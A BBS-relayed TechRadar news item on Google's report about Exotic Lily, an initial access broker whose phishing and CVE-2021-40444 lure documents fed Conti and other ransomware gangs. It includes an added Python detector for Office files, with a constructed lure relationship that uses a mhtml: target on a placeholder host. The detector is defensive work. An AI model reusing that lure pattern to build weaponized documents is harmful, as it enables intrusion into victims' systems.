• Windows and LinkedIn flaws used in Conti ransomware attacks, Google warns

    From TechnologyDaily@1337:1/100 to All on Fri Mar 18 15:00:04 2022
    Windows and LinkedIn flaws used in Conti ransomware attacks, Google warns

    Date:
    Fri, 18 Mar 2022 14:43:33 +0000

    Description:
    Google reveals Exotic Lily group has been selling access to corporate
    networks to ransomware operators.

    FULL STORY ======================================================================

An initial access broker, working on behalf of the Conti ransomware group (among others), has been targeting hundreds of organizations every day, leveraging a flaw in MSHTML, the proprietary browser engine built into Windows,
    Google's researchers say.

Google's Threat Analysis Group found a group dubbed Exotic Lily working as an initial access broker - breaching target networks, then selling the
    acquired access to the highest bidder.

Ransomware operators often outsource the initial access effort so that they can focus entirely on distributing the ransomware itself and on the subsequent push for ransom payment.

    Fake LinkedIn scam

Exotic Lily was relatively advanced in its tactics, and put in an unusual amount of manual gruntwork for a mass-scale operation, Google claims.

The group would use domain and identity spoofing to pose as a legitimate business, and send out phishing emails, usually faking a business proposal. It would also use publicly available Artificial Intelligence (AI) tools to generate realistic images of people for fake LinkedIn accounts, which lent the campaign credibility.

After initial contact had been made, the threat actor would upload malware to a public file-sharing service, such as WeTransfer, to avoid detection by antivirus programs and increase the chances of delivery to the target endpoint. The malware, usually a weaponized document, exploits a zero-day in Microsoft's MSHTML browser engine, tracked as CVE-2021-40444. The second-stage deployment usually carried the BazarLoader.
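The weaponized documents behind CVE-2021-40444 lures carried an external OLE object relationship whose target used the mhtml: scheme, so the document pulled the MSHTML exploit page from a remote host when opened. Below is an added example (not code from Google's report or from TechRadar) of a scanner that unpacks a .docx and flags that relationship shape. The container builder, the benign and lure relationship parts, and the example.invalid hostname are all constructed here for the demonstration; no real sample is embedded.

```python
"""Flag Office documents whose relationship parts point at an external
OLE object over the mhtml: scheme, the delivery shape used by
CVE-2021-40444 (MSHTML) lure documents.

Added example. The .docx containers below are constructed inline for the
demonstration and are not real Exotic Lily samples."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# Heuristic (assumption of this example): an oleObject relationship marked
# TargetMode="External" whose target starts with mhtml: (optionally carrying
# the !x-usc: redirect) matches the CVE-2021-40444 loader shape and has no
# normal business use, so it is reported rather than scored.
MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)


def suspicious_relationships(docx_bytes: bytes) -> list:
    """Return (rels_part, rId, target) tuples for external mhtml: OLE links."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed rels part: skip it, do not abort the scan
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                is_ole = rel.get("Type", "") == OLE_REL_TYPE
                if external and is_ole and MHTML_RE.match(target):
                    hits.append((name, rel.get("Id", ""), target))
    return hits


def build_docx(rels_xml: str) -> bytes:
    """Minimal .docx-style zip (constructed for the example) holding one
    document-level relationships part; enough for the scanner to run."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: a normal document with a stylesheet and a hyperlink.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
    Target="styles.xml"/>
  <Relationship Id="rId2"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
    Target="https://example.com/proposal" TargetMode="External"/>
</Relationships>"""

# Constructed sample in the CVE-2021-40444 lure shape (example.invalid is a
# placeholder host, not an indicator from the report).
LURE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}"
    Target="mhtml:http://example.invalid/word.html!x-usc:http://example.invalid/word.html"
    TargetMode="External"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("lure", LURE_RELS)):
        print(label, suspicious_relationships(build_docx(rels)))
```

The scan is cheap enough to run on every Office attachment at a mail gateway or on files downloaded from sharing services such as the one described above; it only recognises this one delivery shape, so treat a hit as a high-confidence indicator rather than treating a clean result as proof the document is safe.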


Google's researchers believe the group operates independently and works for the highest bidder. So far, it has been linked to Conti and Diavol, as well as Wizard Spider
    (the alleged operator of the Ryuk ransomware).

Exotic Lily was first spotted in September last year, and at peak
    activity was able to send out more than 5,000 phishing emails to more than 650 organizations, Google claims. The threat actor appears to focus mostly on firms in IT, cybersecurity, and healthcare, although it has been casting a somewhat wider net lately.

    Via: TechCrunch



    ======================================================================
Link to news story: https://www.techradar.com/news/windows-and-linkedin-flaws-used-in-conti-ransomware-attacks-google-warns/


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)